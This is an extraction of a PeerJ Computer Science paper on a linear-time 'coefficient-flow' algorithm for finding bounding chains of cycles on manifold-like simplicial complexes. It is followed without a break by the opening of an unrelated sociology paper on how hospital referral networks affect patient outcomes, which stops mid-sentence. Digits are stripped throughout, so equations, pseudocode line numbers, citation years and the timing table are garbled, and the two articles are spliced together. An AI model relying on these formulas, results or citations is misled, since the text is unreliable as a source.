recently, in rodríguez et al. ( ) the authors have taken a similar approach to ours using a combinatorial method to compute bounding chains of -cycles on -dimensional simplicial complexes. how to cite this article carvalho et al. ( ), an algorithm for calculating top-dimensional bounding chains. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:jfpbdc@kth.se https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. in this paper, we explore the geometric properties of simplicial n-manifolds to provide an algorithm that is able to calculate a chain whose boundary is some prescribed (n− )- dimensional cycle, and we show that the proposed algorithm has a complexity which is linear in the number of (n− )-faces of the complex. this is substantially faster than calculating a solution to the linear system as considered in chambers & vejdemo-johansson ( ), for which the complexity would be, at least, quadratic on the number of n-dimensional faces (gloub & van loan, ). background in what follows we make extensive use of sequences. therefore, for any n∈n, we abbreviate x ,...,xn to x :n. simplicial complexes given a set of points p ⊆rn, we define a k-dimensional simplex, or k-simplex, on points of p as the ordered set [p :k], where p :k ∈p are k+ affinely independent points and are called the vertices of [p :k]. we represent the simplex [p :k] by the convex hull of the points p :k, and we say that two simplices are the same if they have the same points and the ordering of the points differs only by an even permutation. if the ordering differs by an odd permutation we say they have opposite orientations. since a convex hull of a finite set of points is a bounded closed set, it carries the notion of a boundary ∂[p :k] which is defined as: ∂[p :k]=[p :k]+( k− ∑ i= (− )i[p :i− ,pi+ :k])+(− ) k [p :k− ]. the above sum can be interpreted as a ‘‘union with orientation’’, and multiplying by or − is the identity or a reversal of orientation, respectively. note that if p :k are affinely independent, then the boundary of the convex hull does indeed correspond to the union of the convex hulls of all subsets of {p :k} with k distinct points. for example, the boundary of the simplex [p ,p ,p ] is given by: [p ,p ]−[p ,p ]+[p ,p ] applying the only possible orientation-reversing permutation to [p ,p ] gives [p ,p ]+[p ,p ]+[p ,p ]. this corresponds to the union of the edges that form the boundary of the triangle [p ,p ,p ] oriented in such a way as to form a closed path. definition . a set of points p ⊆rn and a set of simplices t ={σ :n}defines a geometric simplicial complex s=(p,t) if any finite subset of a simplex in t is also in t, and given any two simplices [p :k],[q :k′]∈t, the intersection of the convex hulls [p :k]∩[q :k′] is the convex hull of {p :k}∩{q :k′}and is also a simplex in t . for any d we define the d-skeleton of t by td ={σ ∈t|dimσ d}and the d-th level as t(d)={σ ∈t|dimσ =d}. given two simplices σ,τ we write τ cσ if τ ⊂σ and dimτ =dimσ− which can be read as ‘‘τ is a top-dimensional face of σ ’’. note that c is not transitive, and therefore it is carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. not a preorder. its transitive closure, τ <σ however, defines a preorder. we can thus read τ <σ as ‘‘τ is contained in the boundary of σ ’’ or simply ‘‘τ is a face of σ ’’. we say that a simplicial complex s=(p,t) has dimension d if d is the largest integer such that t(d) =∅. definition . a d-dimensional simplicial complex s=(p,t) is called a d-manifold-like simplicial complex if • for every τ ∈td− there exists some σ ∈t(d) such that σ >τ , and • if dimτ =(d− ) then there are at most two σ ∈t(d) satisfying σ >τ . note that a triangulation of a d-manifold is a manifold-like simplicial complex, however the definition also includes other spaces like triangulations of manifolds with boundary and the pinched torus. algebraic description we will focus on finite geometric simplicial complexes s=(p,t) (where |p|,|t|<∞). since such an s has a finite number of simplices, we can define for each level k dim(s) an injective function ιk :t(k) →n such that ιk(t(k))={ ,...,|t(k)|}; we call ι an enumeration of t(k). from this we define the chain complex associated with s. definition . given a simplicial complex s=(p,t) the chain complex associated with s is defined as the pair {(ck(s),dk)} +∞ k= where the ck(s) are vector spaces defined as ck(s)= r|t (k) | and the dk are linear maps dk : ck(s) → ck− (s) defined on basis elements as dk(ei)= ∑ τ∈∂(ι− k (i)) o(i,τ)eιk− (τ) where o(i,τ) is the orientation of τ induced by the boundary of σ = ι− k (i). it can be shown that dk ◦dk+ = , which allows us to define, for each k, the k-th homology group of s as hk(s)=ker(dk)/im(dk+ ). by a slight abuse of notation, for a simplicial complex s=(p,t) and a k-chain c, we write cσ for the coefficient corresponding to σ , eσ for the corresponding basis element and d for the appropriate boundary map whenever these are clear from their contexts. we call the elements p∈ck(s) such that dp= , k-cycles. two k-cycles p,p′ are said to be homologous if there exists a chain c ∈ck+ (s) such that dc =p−p′, so that p−p′ is called a k-boundary. this defines k-homology as the group of k-cycles quotiented by the homology relation. problem description and contribution we are interested in the bounding chain problem, that is, given a cycle p, we want to decide whether or not p is a boundary, and in case it is, provide a witness in the form of a chain c such that ∂c =p; we call c a bounding chain of p. to achieve this, we further specialize the problem to carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. which corresponds to the number of (k − )- and k-faces of the complex, respectively. solve: ∂c =p subject to: cσ =v, ( ) where p is a specified (n− )-boundary in an n-manifold-like simplicial complex s, σ is an n-simplex, and v is a pre-specified real number. in general, the equation ∂c =p has more than one solution c, therefore by adding the constraint cσ =v we are able to make this solution unique. the coefficient-flow algorithm that we present solves this restricted form of the bounding chain problem (by providing one such bounding chain if it exists) and has computational time complexity of o(|s(n− )|). furthermore, we show how the parameters σ and v can be done away with in cases where the chain is unique, and we discuss how this algorithm can be used to find a minimal bounding chain. related work in chambers & wang ( ) the authors address the problem of computing the area of a homotopy between two paths on -dimensional manifolds, which can be seen as a generalization of the same problem, for -dimensional meshes via the hurewicz map (hatcher, ). in chambers & vejdemo-johansson ( ) the authors provide a method for calculating the minimum area bounding chain of a -cycle on a d mesh, that is the solution to the problem argmincarea(c)=p, where ∂c =p ( ) and p is a -chain on a given simplicial complex. this is done by using optimization methods for solving the associated linear system. these methods however have time complexity lower-bounded by matrix multiplication time which is in �(min(n,m) ) where n,m are the number of rows and columns of the boundary matrix (davie & stothers, ). this complexity quickly becomes prohibitive when we handle large complexes, such as one might find when dealing with meshes constructed from large pointclouds. more recently, in rodríguez et al. ( ) the authors proposed a method for computing bounding chains of -cycles in -dimensional complexes, using a spanning tree of the dual graph of the complex. in dey, hirani & krishnamoorthy ( ) the authors address the related problem of efficiently computing an optimal cycle p′ which is homologous to a given cycle p (with z coefficients). this is a significant result given that in chambers, erickson & nayyeri ( ) the authors proved that this cannot be done efficiently (i.e., in polynomial time) for -cycles using z coefficients, a result that was extended in chen & freedman ( ) to cycles of any dimension. methodology for any simplicial complex s, and any pair of simplices σ,τ ∈s such that, τ cσ , we define the index of τ with respect to σ as 〈τ,∂σ〉=〈eτ,deσ〉 (forman, ). note that the index corresponds to the orientation induced by the boundary of σ on τ and can be computed in o(d) time by the following algorithm: carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. index(σ,τ): param: σ - k-simplex represented as a sorted list of indices of points. param: τ - (k− )-face of σ represented as a sorted list of indices. : for each i← ...dimτ : : if τi =σi: : orientation←(− )i : break loop : return orientation by inspecting the main loop we can see that index(σ,τ) returns (− )i where i is the index of the first element at which σ and τ differ. we assume τ is a top dimensional face of σ , so if σ =[s :d], then by definition τ =[s :(i− ),s(i+ ):d] for some i, and so the coefficient of τ in the boundary of σ is (− )i as per the definition of the boundary operator. this is also the index of the first element at which τ and σ differ, since they are represented as sorted lists of indices. the following is an intuitive result, that will be the basis for the coefficient-flow algorithm that we will present in the sequel. proposition . let s be a manifold-like simplicial complex, let c be an n-chain on s and p its boundary. then for any pair of n-simplices σ =σ ′ with ∂σ∩∂σ ′={τ}we have: cσ =〈τ,∂σ〉(pτ −〈τ,∂σ ′ 〉cσ ′). proof. if we expand the equation ∂c =p, we get pτ = ∑ τcω〈eτ,d(cωeω)〉, recall that by definition d(cωeω)= ∑ νcω〈ν,∂ω〉cωeν; and so we get pτ = ∑ τcω〈τ,∂ω〉cωeτ . now since s is a manifold-like simplicial complex and τ =∂σ∩∂σ ′, then σ,σ ′ are the only cofaces of τ , and hence we have: pτ =〈τ,∂σ〉cσ +〈τ,∂σ ′ 〉cσ ′ which can be reorganized to cσ = pτ−〈τ,∂σ ′〉cσ′ 〈τ,∂σ〉 . finally, since the index 〈τ,∂σ〉 is either or − , we can rewrite this equation as: cσ =〈τ,∂σ〉(pτ −〈τ,∂σ ′ 〉cσ ′) next, we present an algorithm to calculate a bounding chain for a (n− )-cycle in an n-manifold-like simplicial complex. the algorithm proceeds by checking every top- dimensional face σ , and calculating the value of the chain on adjacent top-dimensional faces, using proposition . in order to prove that the coefficient-flow algorithm solves problem ( ), will use the fact that we can see the algorithm as a traversal of the dual graph. definition . given an n-dimensional simplicial complex s, recall that the dual graph is a graph g(s)=(v,e) with set of vertices v =s(n) and (σ,σ ′)∈e if dim(σ∩σ ′)=n− . proposition . if s is a manifold-like simplicial complex, where g(s) is connected, and p is an (n− )-boundary, then coefficient- flow(p,σ,v) returns a bounding chain c of p satisfying cσ =v, if such a boundary exists. furthermore, the main loop ( – ) is executed at most o(|s(n− )|) times. carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. coefficient-flow(p,σ ,v ): param: p — an n− boundary of the simplicial complex s param: σ — an n–simplex from where the calculation will start param: v — the value to assign the bounding chain at sigma return: c — a bounding chain of p satisfying cσ =v (if it exists) : initialize c and mark every n- and (n− )-cell of s as not seen. : initialize an empty queue q : let τ ∈∂σ : enqueue (σ ,τ ,v ) into q. : while q is non-empty: : (σ,τ,v)←pop first element from q : if σ has been marked seen: : if v =cσ : the problem has no solution : else: : if τ has been marked seen: skip : cσ ←v : mark τ and σ as seen : for each τ ′∈∂σ : : if σ is the only coface of τ ′: : mark τ ′ as seen : if pτ ′ =〈∂σ,τ ′〉v : the problem has no solution : else: : if τ ′ has not been marked as seen: : σ ′←other coface of τ ′ : v′←〈∂σ ′,τ〉(pτ −〈∂σ,τ〉v) : enqueue (σ ′,τ ′,v′) into q : return c proof. we start by proving the bound on the number of executions of the main loop. this is guaranteed by the fact that the loop is executed while the queue is non-empty, and a triple (σ,τ,v) can only be inserted in line ( ) if τ has not been marked as seen. furthermore, since τ has at most two cofaces, say, σ,σ ′, we can only enqueue τ if we are analyzing σ or σ ′ and so for each τ , at most two elements are placed in the queue, and hence the main loop gets executed at most |s(n− )| times. to prove correctness of the algorithm, we have to prove that it outputs an error if and only if the problem has no solution, and otherwise it outputs a bounding chain of p with cσ =v. first, we note that if a face σ is marked as seen, the value of cσ can never be reassigned. this is because the program branches on whether or not σ has been marked as seen, and cσ can only be assigned on line ( ) which is bypassed if σ has been previously marked as seen. from this fact we conclude that cσ =v as it is assigned on line ( ) and σ is marked as seen in the first iteration of the main loop. carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. second, note that there is an edge between two n-faces in the dual graph if and only if they share an (n− )-face. this implies that as we execute the algorithm, analyze a new n-face σ and successfully add the other cofaces of elements of the boundary of σ , we add the vertices neighboring σ in the dual graph. since the dual graph is connected all of the nodes in the graph are eventually added, and hence all of the n-faces are analyzed. third, we note that for any pair (τ,σ) with dimσ =n and τ c σ , either σ is the only coface of τ , or τ has another coface, σ ′. in the first case, if pτ = cσ〈τ,∂σ〉 an error is detected on line ( ). in the second case, assuming that the triple (σ,τ,v) is enqueued before (σ ′,τ,v′) we have v′=〈∂σ ′,τ〉(pτ −〈∂,σ〉v) as is assigned in line ( ) then (dc)τ =〈∂σ,τ〉v+〈∂σ ′ ,τ〉v′ =〈∂σ,τ〉v+〈∂σ ′,τ〉(〈∂σ ′,τ〉(pτ −〈∂,σ〉v)) =〈∂σ,τ〉v+pτ −〈∂σ,τ〉v =pτ. finally, since upon the successful return of the algorithm, this equation must be satisfied by every pair τ cσ , it must be the case that dc =p. if this is not the case, then there will be an error in line ( ) and the algorithm will abort. � note that the connectivity condition can be removed if we instead require a value for one cell in each connected component of the graph g(s), and throw an error in case there is an (n− )-simplex τ with no cofaces, such that pτ = . furthermore, the algorithm can be easily parallelized using a thread pool that iteratively processes elements from the queue. finally, in the case where it is known that s has an (n− )-face τ with a single coface, we do not need to specify σ or v in coefficient-flow, and instead use the fact that we know the relationship between the coefficient pτ and that of its coface in a bounding chain c of p, i.e., pτ =〈∂σ,τ〉cσ . this proves corollary . bounding-chain(p): param: p — an n− boundary of the simplicial complex s return: c — a bounding chain of p : for each τ ∈sn− : : if τ has a single coface: : σ ← the coface of τ : v ←〈∂σ,τ〉pτ : break loop : c ←coefficient-flow(p,σ,v) : returnc corollary . if s is a connected n-manifold-like simplicial complex with a connected dual graph, and has an (n− )-face with a single coface, then given an (n− )-cycle p on s, bounding-chain(p) returns a bounding chain of p if one exists. carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. implementation details we will now discuss some of the choices made in our implementation of the coefficient- flow algorithm (https://www.github.com/crvs/coeff-flow). before we can address the problem of considering chains on a simplicial complex we first need to have a model of a simplicial complex. for this, we decided to use a simplex tree model (boissonnat & maria, ) provided by the gudhi library (the gudhi project, ) as it provides a compact representation of a simplicial complex (the number of nodes in the tree is in bijection with the number of simplices) which allows us to quickly get the enumeration of a given simplex σ . indeed, the complexity of calculating ιk(σ) is in o(dimσ). it is important to compute the enumeration quickly because in our implementation of coefficient-flow we use arrays of booleans to keep track of which faces of the simplicial complex have been seen before, as well as numerical arrays to store the coefficients of the cycle and its bounding chain, which need to be consulted at every iteration of the loop. however, finding the cofaces of the simplicial complex is not as easy in a simplex tree, since, if σ =[pi :ik], this would require to search every child of the root node of the tree that has an index smaller than i , followed by every child of the node associated with pi and so on, which in the worst case scenario is in o(dimσ|s( )|). thus we need to adopt a different method. for this, we keep a hasse diagram of the face relation which comprises a directed graph whose vertices are nodes in the simplex tree and has edges from each face to its codimension- cofaces (see for instance di battista & tamassia ( )) for more details of this data-structure). this allows us to find the codimension- cofaces of a simplex of s in o( ) with a space overhead in o(|s|). with these elements in place, we can analyze the complexity of our implementation of the coefficient-flow algorithm in full: lemma . the coefficient-flow algorithm using a simplex tree and a hasse diagram has computational (time) complexity o(d |s(d− )|) where d=dims. proof. in proposition we saw that the coefficient-flow algorithm executes the main loop at most o(|s(d)|) times, so we only need to measure the complexity of the main loop, in order to obtain its time complexity. this can be done by checking which are the costly steps: • in lines ( ) and ( ) checking whether a face has been marked as seen requires first computing ιk(τ) which, as we stated above, has time complexity o(k), with k≤d. • in line ( ), computing the faces of a simplex σ requires o(dimσ ) steps, and yields a list of size dimσ , hence the inner loop ( – ) is executed dimσ times, where dimσ =d, for each element placed in the queue. • the loop ( – ) requires once again, computing ι(τ ′), and 〈∂σ,τ〉, each of these operations, as we explained before, carries a time complexity o(d). • all other operations have complexity o( ). composing these elements, the total complexity of one iteration of the main loop is o(max{d,d ,d ·d}) = o(d ), which yields a final complexity for the proposed implementation, of o(d |s(d− )|). � carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.github.com/crvs/coeff-flow http://dx.doi.org/ . /peerj-cs. we use the least squares conjugate gradient descent method to solve the system. figure examples of bounding chains: the edges in blue form cycles in the mesh, and the faces in red form the corresponding bounding chain as computed by the coefficient-flow algorithm. in (a) we depict the mesh of the stanford bunny the stanford d scanning repository ( ) and in (b) we show the mesh of a bee smithsonian ( ). in both these meshes we depict examples of bounding chains, where the edges in blue form cycles, and the faces in red form the corresponding bounding chain as computed by the coefficient-flow algorithm. in both cases the depicted bounding chains correspond to the op- timal bounding chains (w.r.t. the number of faces), these can by obtained by choosing σ and v so as to yield the desired chain. in this case, since the two complexes are topological spheres and the cycles are sim- ple cycles (meaning they are connected and do not self-intersect), there are only two possible bounding chains that do not include all the faces of the complex, which can be obtained by running the algorithm three times, choosing σ arbitrarily, and setting v to be ,n or−n where n = maxτ∈s( )|pτ|. in the case of non-simple cycles, more alternatives would exist. full-size doi: . /peerjcs. /fig- example runs and tests in fig. we provide an example of the output of the coefficient-flow algorithm for the mesh of the stanford bunny (the stanford d scanning repository, ) and the eulaema meriana bee model from the smithsonian d model library (smithsonian, ). for comparison, we performed the same experiments using the eigen linear algebra library (eigen, ) to solve the underlying linear system, and summarized the results in table . this allowed us to see that even though both approaches remain feasible with relatively large meshes, solving the linear system consistently underperforms using the coefficient-flow algorithm. even though coefficient-flow is expected to outperform a linear system solver (an exact solution to a linear system has �(n ) time complexity), we wanted to test it against an approximate sparse system solver. such solvers (e.g., conjugate gradient descent (gloub & van loan, )) rely on iterative matrix products, which in the case of boundary matrices of dimension d can be performed in o((d+ )n) where n is the number of d-dimensional simplices, placing the complexity of the method in �((d+ )n). in order to observe the difference in complexity class we performed randomized tests on both implementations. carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. since boundary matrices are naturally sparse, and we are computing an approximate solution, the complexity can be improved beyond the aforementioned �(n ). table timing for computation of bounding chains using coefficient-flow, and using eigen in several meshes. ‘‘bunny’’ and ‘‘bee (sample)/bee (full)’’ refer to the meshes in figs. a and b, respec- tively. the mesh ‘‘bee (full)’’ is the one obtained from smithsonian ( ), whereas the one labeled ‘‘bee (sample)’’ is a sub-sampled version of it. mesh faces edges vertices eigen coefficient-flow bunny . (s) . (s) bee (sample) . (s) . (s) bee (full) . (s) . (s) figure running times for a calculating the bounding chain of a cycle as a function of the number of edges (a), and log–log plot of the same data (b). full-size doi: . /peerjcs. /fig- in this scenario we made a mesh on a unit square from a random sample. by varying the number of points sampled from the square, we effectively varied the resolution of the mesh. finally, at each resolution level we snapped a cycle onto the mesh, and computed its bounding chain using both coefficient-flow and by solving the sparse linear system as before. we plotted the timings in fig. from where we can experimentally observe the difference in the complexity class between our algorithm and the solution to the sparse linear system. furthermore by analyzing the log-log plot in fig. b, we can confirm our complexity estimates by analyzing the slope of the lines where the samples are distributed, i.e., solving the sparse linear system is approximately o(n . ) complexity, whereas coefficient-flow displays linear complexity. conclusion and future work while the problem of finding a bounding chain for a given cycle in a simplicial complex remains a challenging one for large complexes, we showed that this problem can be solved efficiently for codimension- boundaries. we implemented and tested our algorithm and have provided complexity bounds for its run-time. however, this leaves open the question of finding bounding chains for boundaries of higher codimension, for which solving a large sparse linear system is still, to the best of our knowledge, the only feasible approach, save for codimension cycles in dimension carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. (rodríguez et al., ). in the future we would like to generalize our algorithm to be able to work with cobounding cochains (i.e., in cohomology), as well as considering the optimality question (i.e., finding the minimal bounding chain w.r.t. some cost function). additional information and declarations funding this work has been supported by the knut and alice wallenberg foundation and the swedish research council. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: knut and alice wallenberg foundation. swedish research council. competing interests the authors declare there are no competing interests. author contributions • j. frederico carvalho conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • mikael vejdemo-johansson, danica kragic and florian t. pokorny authored or reviewed drafts of the paper. data availability the following information was supplied regarding data availability: github: https://www.github.com/crvs/coeff-flow. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references boissonnat j-d, maria c. . the simplex tree: an efficient data structure for general simplicial complexes. algorithmica ( ): – . chambers ew, erickson j, nayyeri a. . minimum cuts and shortest homologous cycles. in: symposium on computational geometry doi . / . . chambers ew, vejdemo-johansson m. . computing minimum area ho- mologies. in: computer graphics forum, vol. . wiley online library, – doi . /cgf. . carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.github.com/crvs/coeff-flow http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . / . http://dx.doi.org/ . /cgf. http://dx.doi.org/ . /peerj-cs. chambers ew, wang y. . measuring similarity between curves on -manifolds via homotopy area. socg ’ . in: proceeding of the twenty-ninth annual symposium on computational geometry. new york: acm, – doi . / . . chen c, freedman d. . hardness results for homology localization. discrete and computational geometry ( ): – doi . /s - - - . davie am, stothers aj. . improved bound for complexity of matrix multiplication. proceedings of the royal society of edinburgh section a: mathematics ( ): – doi . /s . dey tk, hirani an, krishnamoorthy b. . optimal homologous cycles, total uni- modularity, and linear programming. siam journal on computing ( ): – doi . / . di battista g, tamassia r. . algorithms for plane representations of acyclic digraphs. theoretical computer science ( ) doi . / - ( ) - . edelsbrunner h, harer j. . computational topology: an introduction. providence: american mathematical soc. edelsbrunner h, letscher d, zomorodian a. . topological persistence and simplification. discrete & computational geometry ( ): – . eigen. . version . . . available at http://eigen.tuxfamily.org/ . forman r. . morse theory for cell complexes. advances in mathematics ( ): – doi . /aima. . . gloub gh, van loan cf. . matrix computations. rd edition. london: johns hopkins university press. hatcher a. . algebraic topology. nd edition. cambridge: cambridge university press. pokorny ft, hawasly m, ramamoorthy s. . topological trajectory classification with filtrations of simplicial complexes and persistent homology. international journal of robotics research ( – ): – doi . / . rodríguez aa, bertolazzi e, ghiloni r, specogna r. . efficient construction of - chains with a prescribed boundary. journal of numerical analysis ( ): – doi . / m . smithsonian x. . d: eulaema meriana bee, smithsonian gardens. available at https:// d.si.edu. the gudhi project. . gudhi user and reference manual. gudhi editorial board available at http://gudhi.gforge.inria.fr/doc/latest/ . the stanford d scanning repository. . available at https://graphics.stanford.edu/ data/ dscanrep/ . carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s http://dx.doi.org/ . / http://dx.doi.org/ . / - ( ) - http://eigen.tuxfamily.org/ http://dx.doi.org/ . /aima. . http://dx.doi.org/ . / http://dx.doi.org/ . / m https:// d.si.edu http://gudhi.gforge.inria.fr/doc/latest/ https://graphics.stanford.edu/data/ dscanrep/ https://graphics.stanford.edu/data/ dscanrep/ http://dx.doi.org/ . /peerj-cs. © authors. this work is licensed under the creative commons attribution . license (https://creativecommons.org/licenses/by/ . /). connections issue | vol. article | doi: . /connections- . clients’ outcomes from providers’ networks: the role of relational exclusivity and complementary capabilities denis trapido, ,* francesca pallotti and alessandro lomi university of washington bothell, bothell, washington. university of greenwich, london, uk. university of italian switzerland, switzerland and university of exeter, england, uk. *e-mail: dtrapido@uw.edu this article was accepted by prof david schaefer, action editor. abstract organizations have leeway in how much they employ their network relations to the benefit of their clients. when do they do so more rather than less? relying on research on trust and knowledge absorption, the authors suggest that providers’ network relations generate better outcomes for their clients when these relations are concentrated in a limited, exclusive set of partners. the authors argue that providers’ relational exclusivity benefits clients because it facilitates the awareness and use of partners’ complementary client service capabilities. an analysis of a regional network of patient referrals among hospitals supported this argument. the study highlights the role of interorganizational partnership networks in activating client service capabilities and stimulates further inquiry into providers’ network features that benefit the users of their services. keywords interorganizational networks, client benefits, health care. the implications of interorganizational collaboration networks for the benefit of the users of organizations’ offerings − variously called consumers, clients, cus- tomers or patrons − are puzzlingly variable. clients may enjoy substantial quality and price benefits from providers’ collaboration networks (brueckner and whalen, ; morrish and hamilton, ) . yet network ties among providers may also disadvantage their clients by limiting the clients’ ability to choose between independent providers or to judge the quality of the offerings (baker and faulkner, ; ingram and roberts, ). neutral scenarios, when providers’ networks do not affect the benefits of the users of their services, are also possible. why such different outcomes? what determines the extent to which providers’ network relations benefit their clients? organizational networks research has given this question remarkably short shrift. studies have examined the benefits of provider networks for buyer firms (uzzi, ; uzzi and gillespie, ; uzzi and lancaster, ), but not for individual end customers. studies in other disciplines that touched upon the question have generally converged on the importance of providers’ motivation to benefit their clients. some studies implied that providers may jointly benefit clients when they are intrinsically motivated to collaborate in the clients’ interest (bunderson and thompson, ; leana et al., ; wrzesniewski et al., ). others noted a similar motivating effect of external pressures to collaborate on improving service recipients’ outcomes, including institutional pressures by professional associations or accreditations agencies (durand and mcguire, ; ruef and scott, ) and competitive pressures forcing providers into alliances whose efficiency benefits spill over to their clients (brueckner and whalen, ; morrish and hamilton, ). going forward, we use the term “provider” to denote any organization that provides goods or services. because we develop and test an argument that specifically applies to providers and users of professional services, we will refer to users of providers’ offerings as “clients” or “service recipients.” we will use more general terms, such as “customer” or “consumer,” when they feature in arguments that we reference. clients’ outcomes from providers’ networks while the role of providers’ motivation is undeniable, motivation cannot fully account for clients’ benefits from providers’ network relations. even highly motivated providers can put their networks in the service of their clients only to the extent that their network relations improve their capability to serve clients (wuyts et al., ). a full account of service users’ benefits from providers’ networks is not possible without understanding when and how providers’ networks unlock this capability. our study takes an early step toward such understanding. we build on the fundamental insight of organizational network theory that organizational outcomes depend on features of interorganizational partnership networks (borgatti and halgin, ; powell et al., ; uzzi , ). we extend the notion that features of these networks enable organizational outcomes, arguing that network features may also enable client outcomes. building on theories of trust and knowledge absorption, we argue that relational exclusivity is a feature of providers’ ego networks that improves their capability to benefit clients: providers’ partnerships produce better outcomes for their clients when they connect to their partnership network through selected, exclusive relations. we further argue that relational exclusivity benefits clients by helping providers combine client service capabilities; its effect is, therefore, more pronounced to the extent that the partners’ client service capabilities are complementary. we examine our argument in a regional patient referral network comprising hospitals in italy. we follow the lead of previous studies that used data from health care to test theoretical arguments generalizable across industries (barrera and van de bunt, ; drange, ) and patient outcome data in particular to operationalize client benefit (e.g. dibenigno and kellogg, ; provan and milward, ; schoonhoven, ). specifically, we test the effects of referral network features on the benefits that patients derive from being routed toward providers of better care. our research contributes to organizational network theory by identifying a provider network feature that enables better client outcomes. we transcend the motivational explanations of client outcomes from providers’ network relations, showing that client outcomes depend on the extent to which these relations activate providers’ capability to serve client needs. the study challenges organizational network theory to match the rich literature on interorganizational network features that benefit providers with an equally rich understanding of network features that benefit clients. we also offer practical recommendations to policymakers on improving client outcomes from provider networks. theory and hypotheses motivational determinants of client outcomes from provider networks studies of determinants of client benefits from providers’ network relations are spread across various literatures and have been in minimal dialogue with each other. the common feature of these diverse studies is the emphasis on providers’ motivation. in different ways, they suggested that providers are motivated to use their network relations in the interest of the client insofar as the providers’ rewards are interdependent with their clients’ outcomes. the interdependence of providers’ and customers’ outcomes is most obvious when it is inherent in the nature of the transaction. for example, in the venture capital industry, the investing firms’ collaboration ties simultaneously benefit the investing firms and their investment targets (hochberg et al., ; ozmel et al., ). similar interdependence may exist due to contractual arrangements, such as contingent fee contracts in legal and financial services, which explicitly make providers’ rewards dependent on clients’ outcomes (gravelle and waterson, ; rau, ). however, the interests of providers and their customers are usually imperfectly aligned. then, providers have leeway to disregard the benefit of the customers in their network relations, or even to act against it. in the milder of such scenarios, a fully booked hotel whose management is linked to another hotel by friendship relations may refer potential customers to that partner hotel (ingram and roberts, ); thus, steering them away from better competing offers. the more drastic scenarios have attracted economists’ attention since the days of adam smith, who famously commented that “people of the same trade seldom meet together, even for merriment and diversion, but the conversation ends in a conspiracy against the public, or in some contrivance to raise prices” (smith, [ ] : ). modern research examines similar designs by “people of the same trade” under the rubric of organized special interests (boies, ; grier et al., ) or collusion (rotemberg and saloner, ). when providers’ outcomes are loosely related to clients’ outcomes, two categories of factors may motivate organizations to jointly improve clients’ outcomes. first, organizations may be motivated by external pressures. most obviously, such pressure may come from antitrust regulators explicitly tasked with connections preventing and punishing collaboration that is harmful to clients. professional associations or accreditation agencies may also exert external pressure on providers to adopt service standards above and beyond government regulations (durand and mcguire, ; ruef and scott, ), including standards that regulate providers’ collaboration (cohen and hilligoss, ; patterson, ). furthermore, competitive pressure may impel providers to jointly benefit clients, e.g. by forming alliances that improve services and cut prices (brueckner and whalen, ; morrish and hamilton, ). second, providers may be intrinsically motivated to provide good customer experience. research has highlighted a secular sense of calling − that is, con- struing work as a fulfilling, socially useful activity − and shown the role of calling in sustaining the quality of ser- vice (bunderson and thompson, ; wrzesniewski et al., ; wuyts et al., ). individuals or organi- zations driven by a sense of calling may collaboratively craft work routines that lead to better service quality (leana et al., ). enabling network features no matter how motivated providers are to put their network ties in the service of clients, they can only do so if their own and their network partners’ capabilities can be joined in ways that produce better client service (wuyts et al., ). without denying the importance of motivational factors, we therefore shift the focus to the role of network features that unlock providers’ capabilities to jointly benefit clients. we extend the basic insight of network theory that individuals’ and organizations’ outcomes depend on features of the networks in which they are embedded (granovetter, ; borgatti and halgin, ), positing that network features may also shape the outcomes that organizations produce for their clients. network features enabling organizational outcomes an extensive, vibrant literature has documented features of organizations’ ego networks that enable beneficial organizational outcomes. for example, a balanced mix of strong and weak ties in a firm’s network has been shown to improve its survival chances (uzzi, ). there is evidence that firms that are well-connected (central) in their industry’s overall network attain better performance (powell et al., ; tan et al., ), and so do firms whose network partners are diverse (baum et al., ). studies found that organizations’ innovation performance is better when their networks bridge between industry peers (soda, ) and when they have fewer ties connecting them to competitors through intermediaries (pahnke et al., ). networks that connect organizations to disconnected, non- redundant partners have been shown to be advan- tageous to organizations’ performance in uncertain, entrepreneurial environments, while networks that connect to highly interconnected partners are advan- tageous in stable environments (baum et al., ; rowley et al., ). relational exclusivity as an enabler of client outcomes service providers routinely shape the outcomes not only for themselves but also for their clients. given the amply evidenced potential of beneficially structured networks to create economic value for providers, we suggest that features of providers’ networks have a comparable potential to shape the benefits of their clients. rather than attempt to develop an exhaustive theory of providers’ ego network features that are favorable to client outcomes, our study takes an early step toward such theory by identifying one favorable feature, relational exclusivity. providers’ network relations are exclusive to the extent that they are concentrated to few select partners rather than evenly spread across available partners (see figure for illustration). we argue that providers linked to the network through exclusive relations − sometimes synonymously referred to as embedded relations (uzzi, ; shipilov, ) − better cater to client needs because such relations facilitate providers’ awareness and use of the partners’ client service capabilities . theory suggests two reasons why relational exclusivity helps develop awareness of partners’ capabilities to serve clients. first, exclusive commit- ment to a limited set of network 